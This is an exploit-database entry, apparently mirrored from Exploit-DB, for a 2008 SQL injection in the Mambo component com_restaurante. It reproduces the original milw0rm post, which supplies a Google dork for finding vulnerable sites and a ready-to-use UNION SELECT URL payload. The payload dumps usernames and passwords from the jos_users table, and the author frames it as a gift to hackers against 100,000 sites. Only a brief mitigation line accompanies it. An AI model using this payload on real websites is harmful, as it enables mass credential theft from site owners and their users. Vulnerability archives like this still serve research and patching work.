header-logo
Suggest Exploit
vendor:
Restaurante
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Restaurante
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:detodas:restaurante
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mambo Component com_restaurante SQL Injection

An attacker can exploit a SQL injection vulnerability in the Mambo Component com_restaurante. By sending a specially crafted HTTP request, an attacker can execute arbitrary SQL commands on the underlying database. This can be used to gain access to sensitive information stored in the database, modify data, or exploit other vulnerabilities in the database server software.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

##########################################
#
# Mambo Component com_restaurante SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
############################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİT HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_restaurante"
#
###########################################
EXPLOIT :

index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/*


###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

side note:
	<name>Restaurante</name>
	<author>Detodas</author>
	<creationDate>31-07-2007</creationDate>
	<license>This component is released under the GNU/GPL License</license>
	<authorEmail>detodo@masde50.net</authorEmail>

	<authorUrl>www.detodo.masde50.net</authorUrl>
	<version>1.0</version>
	<description>The structure of this component is based on the structure of the component Alberghi by Vamba</description>

# milw0rm.com [2008-03-19]